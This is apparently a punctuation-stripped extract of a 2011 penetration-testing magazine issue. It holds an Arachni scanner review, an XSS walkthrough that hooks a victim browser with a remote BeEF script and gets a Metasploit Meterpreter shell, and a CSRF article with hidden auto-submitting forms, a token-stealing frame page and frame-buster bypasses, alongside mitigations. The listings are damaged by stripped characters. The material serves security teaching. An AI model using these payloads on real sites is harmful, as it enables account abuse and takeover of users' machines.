Every security consultant or hacker must understand the strengths and weaknesses of his or her toolset and to must choose the best combination of tools possible for the job at hand Is Arachni worthwhile
Time for an in-depth review
Under the HoodAccording to the documentation Arachni offers the following
bull Simplicity everything is simple and straight-forward from a userrsquos or component developerrsquos point of view
bull A stable efficient and high-performance framework Arachni allows custom modules reports and plug-ins Developers can easily use the advanced framework features without knowing the nitty gritty details
Pulling the Legs of ArachniArachni is a fire-and-forget or point-and-shoot web application vulnerability scanner developed in Ruby by Tasos ldquoZapotekrdquo Laskos It got quite a good score for the detection of Cross-Site-Scripting and SQL Injection issues on the recently publicised vulnerability scanner benchmark by Shay-Chen
Table 1 Overview of Audit and Reconnaissance modules included with Arachni
Audit Modules Recon ModulesSQL injectionBlind SQL injection using rDiff analysisBlind SQL injection using timing attacksCSRF detectionCode injection (PHP Ruby Python JSP ASPNET)Blind code injection using timing attacks (PHP Ruby Python JSP ASPNET)LDAP injectionPath traversalResponse splittingOS command injection (nix Windows)Blind OS command injection using timing attacks (nix Windows)Remote le inclusionUnvalidated redirectsXPath injectionPath XSSURI XSSXSSXSS in event attributes of HTML elementsXSS in HTML tagsXSS in HTML script tags
Allowed HTTP methodsBack-up lesCommon directoriesCommon lesHTTP PUTInsufficient Transport Layer Protection for password formsWebDAV detectionHTTP TRACE detectionCredit Card number disclosureCVSSVN user disclosurePrivate IP address disclosureCommon backdoorshtaccess LIMIT miscongurationInteresting responsesHTML object grepperE-mail address disclosureUS Social Security Number disclosureForceful directory listing
WEB APP VULNERABILITIES
Page 22 httppentestmagcom012011 (1) November Page 23 httppentestmagcom012011 (1) November
talks to one or more dispatchers that will perform the scanning job New in the latest experimental branch is that dispatchers can communicate with each other and share the load (the Grid)
This is great if you want to speed up the scan or if you want to execute some crazy things like running
We can vouch that both simplicity and performance goals have been attained by Arachni Since the framework is still under heavy development stability is sometimes lacking but at no time this interfered with our vulnerability assessments
Arachni is highly modular both from an architecture point of view as a source code point of view The Arachni client (web or command-line) connects to one or more dispatchers that will execute the scan The connection to these dispatchers can be secured by SSL encryption and cert based authentication One dispatcher can handle multiple clients Multiple dispatchers can share a load and communicate with each other to optimise and speed-up the scanning process
The asynchronous scanning engine supports both HTTP and HTTPS and has pauseresume functionality Arachni supports upstream proxies (for SOCKS4 SOCKS4A SOCKS5 HTTP11 and HTTP10) as well as proxy authentication
The scanner can authenticate versus the web application using form-based authentication HTTP Basic and Digest Authentication and NTLM
At the start of every scan a crawler will try to detect all pages In version 03 this was optional but since version 04 the crawler will always be run at the start of the scan This crawler has filters for redundant pages based on regular expressions and counters and can include or exclude URLs based on regular expressions Optionally the crawler can also follow subdomains There is also an adjustable link count and redirect limit
The HTML parser can extract forms links cookies and headers It can graciously handle badly written HTML due to a combination of regular expression analysis and the Nokogiri HTML parser
Arachni offers a very simple and easy to use module API enabling a developer to access helper audit methods and writing custom modules in a matter of minutes Arachni already includes a large number of modules audit modules and reconnaissance (recon) modules Table 1 provides an overview
Arachni offers report management The following reports can be created standard output HTML XML TXT YAML serialization and the Metareport providing Metasploit integration for automated and assisted exploitation
Arachni has many build-in plug-ins that have direct access to the framework instance Plug-ins can be used to add any functionality to Arachni Table 2 provides an overview of currently available plug-ins
InstallationArachni consists of client-side (web or shell) and server-side functionality (the dispatchers) A client
Table 2 Included Arachni plug-ins Plug-ins have direct access to the framework instance and can be used to add any functionality to Arachni
Plug-insPassive Proxy Analyses requests and responses
between the web application and the browser assisting in AJAX audits logging-in andor restricting the scope of the audit
Form based AutoLogin Performs an automated login
Dictionary attacker Performs dictionary attacks against HTTP Authentication and Forms based authentication
Proler Performs taint analysis with benign inputs and response time analysis
Cookie collector Keeps track of cookies while establishing a timeline of the changes
Healthmap Generates a sitemap showing the health (vulnerability present or not) of each crawledaudited URL
Content-types Logs content-types of server responses aiding in the identication of interesting (possibly leaked) les
WAF (Web Application Firewall) Detector
Establishes a baseline of normal behaviour and uses rDiff analysis to determine if malicious inputs cause any behavioural changes
Metamodules Loads and runs high-level meta-analysis modules premidpost-scanAutoThrottle Dynamically adjusts HTTP throughput during the scan for maximum bandwidth utilizationTimeoutNotice Provides a notice for issues uncovered by timing attacks when the affected audited pages returned unusually high response times to begin with It also points out the danger of DOS (Denail-of-Service) attacks against pages that perform heavy-duty processingUniformity Reports inputs that are uniformly vulnerable across a number of pages hinting to the lack of a central point of input sanitization
WEB APP VULNERABILITIES
Page 24 httppentestmagcom012011 (1) November Page 25 httppentestmagcom012011 (1) November
your dispatchers in multiple geographic zones thanks to Amazon Elastic Compute Cloud (EC2) or similar cloud providers
Letrsquos get our hands dirty and start with the experimental branch (currently at version 04) so we can work with the latest and greatest functionality Another benefit is that this experimental version can work under Windows
Installation under Linux is quick and easy but a Windows set-up requires the installation of Cygwin first Cygwin is a collection of tools that provide a Linux-like environment on Windows as well as providing a large part of Linux APIs Another possibility is to run it natively in Windows using MinGW (Minimalistic GNU for Windows) but at this moment there are too many problems involved with that
LinuxInstallation under Linux is quite straightforward Open your favourite shell and execute the following commands Listing 1
This will install all source directories in your home directory Change all the cd commands if you want the sources somewhere else In case you need an update to the latest versions just cd into the three directories above and perform
$ git pull
$ rake install
Now you can hack the source code locally and play around with Arachni If you encounter a Typhoeus related error while running Arachni issue
$ gem clean
WindowsArachni comes with decent documentation but I had a chuckle when I read the installation instructions for Windows Windows users should run Arachni in Cygwin I knew that this was not going to be a smooth ride Since v03 some changes have been made to the experimental version to make it easier so here we go
Please note that these installation instructions start with the installation of Cygwin and all required dependencies
Install or upgrade Cygwin by running setupexe Apart from the standard packages include the following
bull Database libsqlite3-devel libsql3_0bull Devel doxygen libffi4 gcc4 gcc4-core gcc4-g++
git libxml2 libxml2-devel make openssl-develbull Editors nanobull Libs libxslt libxslt-devel libopenssl098 tcltk
libxml2 libmpfr4bull Net libcurl-devel libcurl4
Listing 1 Installation for Linux
$ sudo apt-get install libxml2-dev libxslt1-dev
libcurl4-openssl-dev libsqlite3-
dev
$ cd
$ git clone gitgithubcomeventmachine
eventmachinegit
$ cd eventmachine
$ gem build eventmachinegemspec
$ gem install eventmachine-100beta4gem
$ cd
$ git clone gitgithubcomArachniarachni-rpcgit
$ cd arachni-rpc
$ $ gem build arachni-rpcgemspec
$ gem install arachni-rpc-01gem
$ cd
$ git clone gitgithubcomZapotekarachnigit
$ cd arachni
$ git checkout experimental
$ rake install
Listing 2 Installation for Windows
$ cd
$ git clone gitgithubcomeventmachine
eventmachinegit
$ cd eventmachine
$ gem build eventmachinegemspec
$ gem install eventmachine-100beta4gem
$ cd
$ git clone gitgithubcomArachniarachni-rpcgit
$ cd arachni-rpc
$ gem build arachni-rpcgemspec
$ gem install arachni-rpc-01gem
$ cd
$ git clone gitgithubcomZapotekarachnigit
$ cd arachni
$ git checkout experimental
$ rake install
WEB APP VULNERABILITIES
Page 24 httppentestmagcom012011 (1) November Page 25 httppentestmagcom012011 (1) November
Accept the installation of packages that are required to satisfy dependencies Note that some of your other tools might not work with these libraries or upgrades In any case an upgrade of Cygwin usually results in recompiling any tools that you compiled earlier
Some additional libraries are needed for the compilation of Ruby in the next step and must be compiled by hand First we need to install libffi Execute the following commands in your Cygwin shell
$ cd
$ git clone httpgithubcomatgreenlibffigit
$ cd libffi
$ configure
$ make
$ make install-libLTLIBRARIES
Next is libyaml Download the latest stable version of libyaml (currently 014) from http httppyyamlorgwikiLibYAML and move it to your Cygwin home folder (probably Ccygwinhomeyour _ windows _ id) Execute the following
$ cd
$ tar xvf yaml-014targz
$ cd yaml-014
$ configure
$ make
$ make install
Now we need to compile and install Ruby Download the latest stable release of Ruby (currently ruby-192-p290targz) from http httpwwwrubyorg and move it to your Cygwin home folder Execute the following commands in the Cygwin shell
$ cd
$ tar xvf ruby-192-p290targz
$ cd ruby-192-p290
$ configure
$ make
$ make install
From your Cygwin shell update and install some necessary modules
$ gem update ndashsystem
$ gem install rake-compiler
$ cd
$ git clone httpgithubcomdjberg96sys-proctablegit
$ cd sys-proctable
$ gem build sys-proctablegemspec
$ gem install sys-proctable-091-x86-cygwingem
Finally we can install Arachni (and the source) by executing the following commands in the Cygwin shell (note these are the same commands as with the Linux installation) Listing 2
In case of weird error-messages (especially on Vista systems) regarding fork during compilation execute the following in your Cygwin shell
$ find usrlocal -iname lsquosorsquo gt tmplocalsolst
Quit all Cygwin shells Use Windows to browse to Ccygwinbin Right click ashexe and choose run as administrator Enter in ash
$ binrebaseall
$ binrebaseall -T tmplocalsolst
Exit ash
Light my FireHow to fire up Arachni depends on whether you want to use it with the new (since version 03) web GUI or simply run everything through the command-line interface Note that the current web GUI does not support all functionality that is available from the command-line
The GUI can be started by executing the following commands
$ arachni_rpcd amp
$ arachni_web
After that browse to httplocalhost4567 and admire the new GUI You will need to attach the GUI to one or more dispatchers The dispatcher(s) will run the actual scan
Figure 1 Edit Dispatchers
WEB APP VULNERABILITIES
Page 26 httppentestmagcom012011 (1) November Page 27 httppentestmagcom012011 (1) November
If you want to use the command-line interface just execute
$ arachni --help
A quick overview of the other screens (Figure 1)
bull Start a Scan start a scan by entering the URL and pressing Launch scan After a scan is launched the screen gives an overview of what issues are detected and how far the process is
bull Modules enable or disable the more than 40 audit (active) and recon (passive) modules that scan for vulnerabilities such as Cross-Site-Scripting (XSS) SQL Injection (SQLi) Cross-Site-Request Forgery (CSRF) or detect hidden features or simply make lists of interesting items such as email addresses
bull Plugins plug-ins help to automate tasks Plug-ins are more powerful than modules and enable to script login sequences detect Web Application Firewalls (WAF) perform dictionary attacks hellip
bull Settings the settings screens allows to add cookies and headers limit the scan to certain directories hellip
bull Reports gives access to the scan reports Arachni creates reports in its own internal format and exports them to HTML XML or text
bull Add-ons three add-ons are installedbull Auto-deploy converts any SSH enabled Linux
box in an Arachni dispatcherbull Tutorial serves as an examplebull Scheduler schedules and run scan jobs at a
specific timebull Log overview of actions taken by the GUI
Your First ScanWe will use both the command-line and the GUI First the command-line start a scan with all modules active This is extremely easy
$ arachni httpwwwexamplecom --report =afroutfile=
wwwexamplecomafr
Afterwards the HTML report can be created by executing the following
$ arachni --repload=wwwexamplecomafr --report=html
outfile=wwwexamplecomhtml
Thatrsquos it Enabling or disabling modules is of course possible Execute the following command for more information about the possibilities of the command-line interface
$ arachni --help
Usually it is not necessary to include all recon modules Some modules will create a lot of requests making detection of your activities easier (if that is a problem with your assignment) and taking a lot more time to finish List all modules with the following command
$ arachni --lsmod
Enabling or disabling modules is easy use the --mods switch followed by a regular expression to include modules or exclude modules by prefixing the regular expression with a dash Example
$ arachni --mods= -xss_ httpwwwexamplecom
The above will load all modules except the module related with Cross-Site-Scripting (XSS)
Using the GUI makes this process even easier Open the GUI by browsing to httplocalhost4567 and accept the default dispatcher
Next steps are to verify the settings in the Settings Modules and Plugins screens Once you are satisfied proceed to the Start a Scan screen
If you want to run a scan against some test applications visit my blog for the list of deliberately vulnerable applications Most of these applications can be installed locally or can be attacked online (please read all related faqs and permissions before scanning a site In most jurisdictions this is illegal unless permission is explicitly granted by the owner)
After the scan just go the Reports screen and download the report in the format you wantFigure 2 Start a scan screen
WEB APP VULNERABILITIES
Page 26 httppentestmagcom012011 (1) November Page 27 httppentestmagcom012011 (1) November
Listing 3 Create your own module
=begin
Arachni
Copyright (c) 2010-2011 Tasos Zapotek Laskos
tasoslaskosgmailcom
This is free software you can copy and distribute
and modify
this program under the term of the GPL v20 License
(See LICENSE file for details)
=end
module Arachni
module Modules
Looks for common files on the server based on
wordlists generated from open
source repositories
More information about the SVNDigger wordlists
httpwwwmavitunasecuritycomblogsvn-digger-
better-lists-for-forced-browsing
The SVNDigger word lists were released under the GPL
v30 License
author Herman Stevens
see httpcwemitreorgdatadefinitions538html
class SvnDiggerDirs lt ArachniModuleBase
def initialize( page )
super( page )
end
def prepare
to keep track of the requests and not repeat them
__audited ||= Setnew
__directories ||=[]
return if __directoriesempty
read_file( all-dirstxt )
|file|
__directories ltlt file unless fileinclude( )
end
def run( )
path = get_path( pageurl )
return if __auditedinclude( path )
print_status( Scanning SVNDigger Dirs )
__directorieseach
|dirname|
url = path + dirname +
print_status( Checking for url )
log_remote_directory_if_exists( url )
|res|
print_ok( Found dirname at +
reseffective_url )
__audited ltlt path
def selfinfo
name =gt SVNDigger Dirs
description =gt qFinds directories
based on wordlists created from
open source repositories The
wordlist utilized by this module
will be vast and will add a consi
derable amount of
time to the overall scan time
author =gt Herman Stevens ltherman
stevensgmailcomgt
version =gt 01
references =gt
Mavituna Security =gt
httpwwwmavitunasecuritycom
blogsvn-digger-better-lists-for-
forced-browsing
OWASP Testing Guide =gt
httpswwwowasporgindexphp
Testing_for_Old_Backup_and_
Unreferenced_Files_(OWASP-CM-006)
targets =gt Generic =gt all
issue =gt
name =gt qA SVNDigger
directory was detected
description =gt q
tags =gt [ svndigger path
directory discovery ]
cwe =gt 538
severity =gt IssueSeverityINFORMATIONAL
cvssv2 =gt
remedy_guidance =gt Review these
resources manually Check if
unauthorized interfaces are exposed
or confidential information
remedy_code =gt
end
end
end
end
WEB APP VULNERABILITIES
Page 28 httppentestmagcom012011 (1) November
Create your Own ModuleArachni is very modular and can be easily extended In the following example we create a new reconnaissance module
Move into your Arachni source tree Yoursquoll find the modules directory In there yoursquoll find two directories audit and recon Move into the recon directory We will create our Ruby module
Arachni makes it real easy if your module needs external files it will search into a subdirectory with the same name Example if you create a svn_digger_dirsrb module this module is able to find external files in the modulesreconsvn_digger_dirs subdirectory
Our new reconnaissance module will be based on the SVNDigger wordlists for forced browsing These wordlists are based on directories found in open source code repositories
If there is a directory that needed to be protected and you forget that it will be found by a scanner that uses these wordlists
Furthermore it can be used as a basis for reconnaissance if a directory or file is detected this might provide clues about what technology the site is using
Download the wordlists from the above URL Create a directory modulesreconsvn_digger_dirs and move the file all-dirstxt from the wordlist archive to the newly created directory
Create a copy of the file modulesreconcommon_
directoriesrb and name it svn_digger_dirsrb Change the code to read as follows Listing 3
The code does not need a lot of explanation it will check whether or not a specific directory exists if yes it will forward the name to the Arachni Trainer (who will include the directory in the further scans) as well as create a report entry for it
Note the above code as well as another module based on the SVNDigger wordlists with filenames are now part of the experimental Arachni code base
ConclusionWe used Arachni in many of our application vulnerability assessments The good points are
bull Highly scalable architecture just create more servers with dispatchers and share the load This makes the scanner a lot more responsive and fast
bull Highly extensible create your own modules plug-ins and even reports with ease
bull User-friendly start your scan in minutesbull Very good XSS and SQLi detection with very few
false positives There are false negatives but this
is usually caused by Arachni not detecting the links to be audited This weakness in the crawler can be partially offset by manually browsing the site with Arachni configured as a proxy
bull Excellent reporting capabilities with links provided to additional information and also a reference to the standardised Common Weakness Enumeration (CWE)
Arachni lacks support for the following
bull No AJAX and JSON supportbull No JavaScript support
This means that you need to help Arachni finding links hidden in JavaScript eg by using it as a proxy between your browser and the web application Yoursquoll need a different tool (or use your brain and manual tests) to check for AJAXJSON related vulnerabilities in the application you are testing
Arachni also cannot examine and decompile Flash components but a lot of tools are at hand to help you with that Arachni does not perform WAF (Web Application Firewall) evasion but then again this is not necessarily difficult to do manually for a skilled consultant or hacker
And why not write your own module or plug-in that implements the missing functionality Arachni is certainly a tool worth adding to your toolkit
HERMAN STEVENSAfter a career of 15 years spanning many roles (developer security product trainer information security consultant Payment Card Industry auditor application security consultant) Herman Stevens now works and lives in Singapore where he is the director of his company Astyran Pte Ltd (httpwwwastyrancom) Astyran specialises in application security such as penetration tests vulnerability assessments secure code reviews awareness training and security in the SDLC Contact Herman through email (hermanstevensgmailcom) or visit his blog (httpblogastyransg)
WEB APP VULNERABILITIES
Page 30 httppentestmagcom012011 (1) November Page 31 httppentestmagcom012011 (1) November
In most commercial penetration testing reports itrsquos sufficient to just show a small alert popup this is to show that a particular parameter is vulnerable to
an XSS attack However this is not how an attacker would function in the real world Sure hersquod use a pop up initially to find out which parameter is vulnerable to an XSS attack Once hersquos identified that though hersquoll look to steal information by executing malicious JavaScript or even gain total control of the userrsquos machine
In this article wersquoll look at how an attacker can gain complete control over a userrsquos browser ultimately taking over the userrsquos machine by using Beef (A browser exploitation framework)
A Simple POCTo start off though letrsquos do exactly what the attacker would do which is to identify a vulnerability For simplicityrsquos
sake wersquoll assume that the attacker has already identified a vulnerable parameter on a page Here are the relevant files which you too can use on your web server if you want to try this also
HTML Page
ltHTMLgt
ltBODYgt
ltFORM NAME=rdquotestrdquo action=rdquosearch1phprdquo method=rdquoGETrdquogt
Search ltINPUT TYPE=rdquotextrdquo name=rdquosearchrdquogtltINPUTgt
ltINPUT TYPE=rdquosubmitrdquo name=rdquoSubmitrdquo value=SubmitgtltINPUTgt
ltFORMgt
ltBODYgt
ltHTMLgt
XSS Beef Metaspoilt Exploitation
Figure 2 BeeF after conguration
Cross Site scripting (XSS) is an attack in which an attacker exploits a vulnerability in application code and runs his own JavaScript code on the victimrsquos browser The impact of an XSS attack is only limited by the potency of the attackerrsquos JavaScript code
Figure 1 User enters in a search box
WEB APP VULNERABILITIES
Page 30 httppentestmagcom012011 (1) November Page 31 httppentestmagcom012011 (1) November
and click a few buttons to configure it Alternatively you could use a distribution like Backtrack which already has BeeF installed Here is a screenshot of how BeeF looks after it is configured (Figure 2)
Instead of the user clicking on a link which will generate a popup box the user will instead be tricked to click on a link which tells his browser to connect to the BeeF controller The URL that the user has to click on is
httplocalhostsearch1phpsearch=ltscript src=
rsquohttp19216856101beefhookbeefmagicjsphprsquogt
ltscriptgtampSubmit=Submit
The IP address here is the one on which you have BeeF running Once the user clicks on the link above you should see an entry in the BeeF controller window showing that a Zombie has connected You can see this in the Log section on the right hand side or the Zombie section on the left hand side Here is a screenshot which shows that a browser has connected to the Beef controller (Figure 3)
Click and highlight the zombie in the left pane and then click on Standard Modules ndash Alert Dialog This will result in a little popup box popping up on the victim machine Herersquos a screenshot which shows the same (Figure 4) And this is what the victim will see (Figure 5)
So as you can see because of Beef even an unskilled attacker can run code which he does not even understand on the victimrsquos machine and steal sensitive data Hence it becomes all the more
Server Side PHP Code
ltphp
$a=$_GET[lsquosearchrsquo]
echo bdquoThe parameter passed is $ardquo
gt
As you can see itrsquos some very simple code where the user enters something in a search box on the first page his input is sent to the server which reads the value of the parameter and prints it on to the screen So instead of a simple text input the attack enters a simple JavaScript into the box the JavaScript will execute on the userrsquos machine and not get displayed The user hence has to just been tricked into clicking on a link httplocalhostsearch1phpsearch=ltscriptgtalert(documentdomain)ltscriptgt
The screenshot below clarifies the above steps (Figure 1)
Beef ndash Hook the userrsquos browserNow while this example is sufficient to prove that the site is vulnerable to XSS itrsquos most certainly not what an attacker will stop at An attacker will use a tool like BeeF (Browser Exploitation Framework) to gain more control of the userrsquos browser and machine
I used an older version of Beef(032) as I just wanted to demonstrate what you can do with such a tool The newer version has been rewritten completely and has many more features For now though extract Beef from the tarball and copy it into your web server directory
Figure 3 Connection with BeeF controller
Figure 4 What attacer will see
Figure 5 What victim will see
Figure 6 Defacing the current Web Page
WEB APP VULNERABILITIES
Page 32 httppentestmagcom012011 (1) November Page 33 httppentestmagcom012011 (1) November
important to protect against XSS Wersquoll have a small section right at the end where I briefly tell you how to mitigate XSS
Irsquoll quickly discuss a few more examples using Beef before we move on to using it as a platform for other attacks Here are the screenshots for the same these are all a result of clicking on the various modules available under the Standard Modules menu
Defacing the Current Web PageThis results in the webpage being rewritten on the victim browser with the text in the lsquoDEFACE STRINGrsquo box Try it out (Figure 6)
Detect all Plugins on the Userrsquos BrowserThere are plenty of other plug-ins inside Beef under the Standard Modules and Browser modules tab which you can try out for yourself I wonrsquot discuss all of them here as the principle is the same What I want to do now though is use the userrsquos hooked Browser to take complete control of the userrsquos machine itself (Figure 7)
Integrate Beef with Metasploit and get a shellEdit Beefrsquos configuration files so that it can directly talk to Metasploit All I had to edit was msfphp to set the correct IP address Once this is done you can launch Metasploitrsquos browser based exploits from inside Beef
Figure 7 Detecting plugins on the user browser
Figure 8 startin Metaslpoit
Figure 9 bdquoJobsrdquo command
Figure 10 Metasploit after clicking bdquoSend Nowrdquo
Figure 11 Meterpreter window - screenshot 1
Figure 12 Meterpreter window - screenshot 2
WEB APP VULNERABILITIES
Page 32 httppentestmagcom012011 (1) November Page 33 httppentestmagcom012011 (1) November
Now first ensure that the Zombie is still connected Then click on Standard modules ndash Browser Exploit and configure the exploit as per the screenshot below Wersquore basically setting the variables needed by Metasploit for the exploit to succeed (Figure 8)
Open a shell and run msfconsole to start metasploit Once you see the msfgt prompt click the zombie in the browser and click the Send Now button to send the exploit payload to the victim You can immediately check if Beef can talk to Metasploit by running the jobs command (Figure 9)
If the victimrsquos browser is vulnerable to the exploit selected (which in this case is the msvidctl_mpeg2 exploit) it will connect back to the running Metasploit instance Herersquos what you see in Metasploit a while after you click Send Now (Figure 10)
Once yoursquove got a prompt yoursquore on that remote system and can do anything that you want with the privileges of that user Here are a few more screenshots of what you can do with Meterpreter The screenshots are self explanatory so I wonrsquot say much (Figure 11-13)
The user was apparently logged in with admin privileges and we could create a user by the name dennis on the remote machine At this point of time we have complete control over 1 machine
Once we have control over this machine we can use FTP or HTTP and download various other tools like Nmap Nessus a sniffer to capture all keystrokes on this machine or even another copy of Metasploit and install these on this machine We can then use these to port scan an entire internal network or search for vulnerabilities in other services that are running on other machines on the network Eventually over a period of time it is potentially possible to compromise every machine on that network
MitigationTo mitigate XSS one must do the following
Figure 13 Meterpreter window - screenshot 3
bull Make a list of parameters whose values depend on user input and whose resultant values after they are processed by application code are reflected in the userrsquos browser
bull All such output as in a) must be encoded before displaying it to the user The OWASP XSS prevention cheatsheet is a good guide for the same
bull White List and Black list filtering can also be used to completely disallow specific characters in user input fields
ConclusionIn a nutshell we can conclude that if even a single parameter is vulnerable to XSS it can result in the complete compromise of that userrsquos machine If the XSS is persistent then the number of users that could potentially be in trouble increases So while XSS does involve some kind of user input like clicking a link or visiting a page it is still a high risk vulnerability and must be mitigated throughout every application
ARVIND DORAISWAMYArvind Doraiswamy is an Information Security Professional with 6 years of experience in SystemNetwork and Web Application Penetration testing In addition he freelances in information security audits trainings and product development [Perl Ruby on Rails] while spending a lot of time learning more about malware analysis and reverse engineering Email ndash arvinddoraiswamygmailcomLinked In ndash httpwwwlinkedincompubarvind-doraiswamy39b21332Other writings ndash httpresourcesinfosecinstitutecomauthorarvind AND httpardsecblogspotcom
Referencesbull httpwwwtechnicalinfonetpapersCSShtmlbull httpswwwowasporgindexphpCross-site_Scripting_
28XSS29bull httpswwwowasporgindexphpXSS_28Cross_Site_
Scripting29_Prevention_Cheat_Sheetbull httpbeefprojectcom
WEB APP VULNERABILITIES
Page 34 httppentestmagcom012011 (1) November Page 35 httppentestmagcom012011 (1) November
In simple words when an evil website posts a new status to your Twitter account while your Twitter login session is still active
Csrf BasicsA simple example of this is the following hidden HTML code inside the evilcom webpage
ltimg src=rdquohttptwittercomhomestatus=evilcomrdquo
style=rdquodisplaynonerdquogt
Many web developers use POST instead of GET requests to avoid this kind of a malicious attack But this
approach is useless as shown by the following HTML code used to bypass that kind of a protection (Listing 1)
Usless DefensesThe following are the weak defenses
Only accept POST This stops simple link-based attacks (IMG frames etc) but hidden POST requests can be created within frames scripts etc
Referrer checking Some users prohibit referrers so you cannot just require referrer headers Techniques to selectively create HTTP request without referrers exist
Requiring multiStep transactions CSRF attacks can perform each step in order
DefenseThe approach used by many web developers is the CAPTCHA systems and one- time tokens CAPTCHA systems are widely used by asking a user to fill the text in the CAPTCHA image every time the user submits a form might make them stop visiting your website This is why web sites use one-time tokens Unlike the CAPTCHA system one-time tokens are unique values stored in a
Cross-site Request ForgeryIN-DEPTH ANALYSIS bull CYBER GATES bull 2011
Cross-Site Request Forgery (CSRF in short) is a web application vulnerability that allows a malicious website to send unauthorized requests to a vulnerable website using the current active session of the authorized users
Listing 1 HTML code used to bypass protection
ltdiv style=displaynonegt
ltiframe name=hiddenFramegtltiframegt
ltform name=Form action=httpsitecompostphp
target=hiddenFrame
method=POSTgt
ltinput type=text name=message value=I like
wwwevilcom gt
ltinput type=submit gt
ltformgt
ltscriptgtdocumentFormsubmit()ltscriptgt
ltdivgt
WEB APP VULNERABILITIES
Page 34 httppentestmagcom012011 (1) November Page 35 httppentestmagcom012011 (1) November
indexphp(Victim website)
And the webpage which processes the request and stores the message only if the given token is correct
postphp(Victim website)
In-depth AnalysisIn-depth analysis shows that an attacker can use an advanced version of the framing method to perform the task and send POST requests without guessing the token The following is a real scenarioListing 4
indexphp(Evil website)
For security reasons the same origin policy in browsers restricts access of browser-side program-ming languages such as JavaScript to access a remote content and the browser throws the following exception
Permission denied to access property lsquodocumentrsquo
var token = windowframes[0]documentforms[lsquomessageFormrsquo]
tokenvalue
Browserrsquos settings are not hard to modify So the best way for web application security is to secure web application itself
Frame BustingThe best way to protect web applications against CSRF attacks is using FrameKillers with one-time tokens FrameKillers are small piece of Javascript code used to protect web pages from being framed
ltscript type=rdquotextjavascriptrdquogt
if(top = self) toplocationreplace(location)
ltscriptgt
It consists of Conditional statement and Counter-action
statement
Common conditional statements are the following
if (top = self)
if (toplocation = selflocation)
if (toplocation = location)
if (parentframeslength gt 0)
if (window = top)
if (windowtop == windowself)
if (windowself = windowtop)
if (parent ampamp parent = window)
if (parent ampamp parentframes ampamp parentframeslengthgt0)
if((selfparentampamp(selfparent===self))ampamp(selfparentfr
ameslength=0))
webpage formrsquos hidden field and in a session at the same time to compare them after the page form submission
Mechanisms used to subvert one-time tokens is usually accomplished by brute force attacks Brute forcing attacks against one-time tokens is useful only if the mechanism is widely used by web developers For example the following PHP code
ltphp
$token = md5(uniqid(rand() TRUE))
$_SESSION[lsquotokenrsquo] = $token
gt
Defense Using One-time TokensTo understand better how this system works letrsquos take a look to a simple webpage which has a form with one-time token Listing 2
Listing 2 Wrong token
ltphp session_start()gt
lthtmlgt
ltheadgt
lttitlegtGOODCOMlttitlegt
ltheadgt
ltbodygt
ltphp
$token = md5(uniqid(rand()true))
$_SESSION[token] = $token
gt
ltform name=messageForm action=postphp method=POSTgt
ltinput type=text name=messagegt
ltinput type=submit value=Postgt
ltinput type=hidden name=token value=ltphp echo $tokengtgt
ltformgt
ltbodygt
lthtmlgt
Listing 3 Correct token
ltphp
session_start()
if($_SESSION[token] == $_POST[token])
$message = $_POST[message]
echo ltbgtMessageltbgtltbrgt$message
$file = fopen(messagestxta)
fwrite($file$messagern)
fclose($file)
else
echo Bad request
gt
WEB APP VULNERABILITIES
Page 36 httppentestmagcom012011 (1) November
And common counter-action statements are these
toplocation = selflocation
toplocationhref = documentlocationhref
toplocationreplace(selflocation)
toplocationhref = windowlocationhref
toplocationreplace(documentlocation)
toplocationhref = windowlocationhref
toplocationhref = bdquoURLrdquo
documentwrite(lsquorsquo)
toplocationreplace(documentlocation)
toplocationreplace(lsquoURLrsquo)
toplocationreplace(windowlocationhref)
toplocationhref = locationhref
selfparentlocation = documentlocation
parentlocationhref = selfdocumentlocation
Different FrameKillers are used by web developers and different techniques are used to bypass them
Method 1
ltscriptgt
windowonbeforeunload=function()
return bdquoDo you want to leave this pagerdquo
ltscriptgt
ltiframe src=rdquohttpwwwgoodcomrdquogtltiframegt
Method 2Using Double framing
ltiframe src=rdquosecondhtmlrdquogtltiframegt
secondhtml
ltiframe src=rdquohttpwwwsitecomrdquogtltiframegt
Best PracticesAnd the best example of FrameKiller is the following
ltstylegt html display none ltstylegt
ltscriptgt
if( self == top ) documentdocumentElementstyledispla
y=rsquoblockrsquo
else toplocation = selflocation
ltscriptgt
Which protects web application even if an attacker browses the webpage with javascript disabled option in the browser
SAMVEL GEVORGYANFounder amp Managing Director CYBER GATESwwwcybergatesam | samvelgevorgyancybergatesamSamvel Gevorgyan is Founder and Managing Director of CYBER GATES Information Security Consulting Testing and Research Company and has over 5 years of experience working in the IT industry He started his career as a web designer in 2006 Then he seriously began learning web programming and web security concepts which allowed him to gain more knowledge in web design web programming techniques and information security All this experience contributed to Samvelrsquos work ethics for he started to pay attention to each line of the code for good optimization and protection from different kinds of malicious attacks such as XSS(Cross-Site Scripting) SQL Injection CSRF(Cross-Site Request Forgery) etc Thus Samvel has transformed his job to a higher level and he is gradually becoming more complete security professional
Referencesbull Cross-Site Request Forgery ndash httpwwwowasporg
indexphpCross-Site_Request_Forgery_28CSRF29 httpprojectswebappsecorgwpage13246919Cross-Site-Request-Forgery
bull Same Origin Policybull FrameKiller(Frame Busting) ndash httpenwikipediaorgwiki
Framekiller httpseclabstanfordeduwebsecframebustingframebustpdf
Listing 4 Real scenario of the attack
lthtmlgt
ltheadgt
lttitlegtBADCOMlttitlegt
function submitForm()
var token = windowframes[0]documentforms[message
Form]elements[token]value
var myForm = documentmyForm
myFormtokenvalue = token
myFormsubmit()
ltscriptgt
ltheadgt
ltbody onLoad=submitForm()gt
ltdiv style=displaynonegt
ltiframe src=httpgoodcomindexphpgtltiframegt
ltform name=myForm target=hidden action=http
goodcompostphp method=POSTgt
ltinput type=text name=message value=I like wwwbadcom gt
ltinput type=hidden name=token value= gt
ltinput type=submit value=Postgt
ltformgt
ltdivgt
ltbodygt
lthtmlgt
WEB APPLICATION CHECKING
Page 38 httppentestmagcom012011 (1) November Page 39 httppentestmagcom012011 (1) November
They are currently being used by hackers on a grand scale as gateways into corporate networks Web Application Firewalls (WAFs)
make it a lot more difficult to penetrate networksIn most commercial and non-commercial areas the
internet has developed into an indispensible medium that offers users a huge number of interesting and important applications Information procurement of any kind buying services or products but also bank transactions and virtual official errands can be conducted easily and comfortably from the screen Waiting times are a thing of the past and while we used to have to search laboriously for information we now have the search engines that deliver the results in a matter of seconds And so browsers and the web today dominate the majority of daily procedures in both our private as well as working lives In order to facilitate all of these processes a broad range of applications is required that are provided more or less publically Their range extends from simple applications for searching for product information or forms up to complex systems for auctions product orders internet banking or processing quotations They even control access to the companyrsquos own intranet
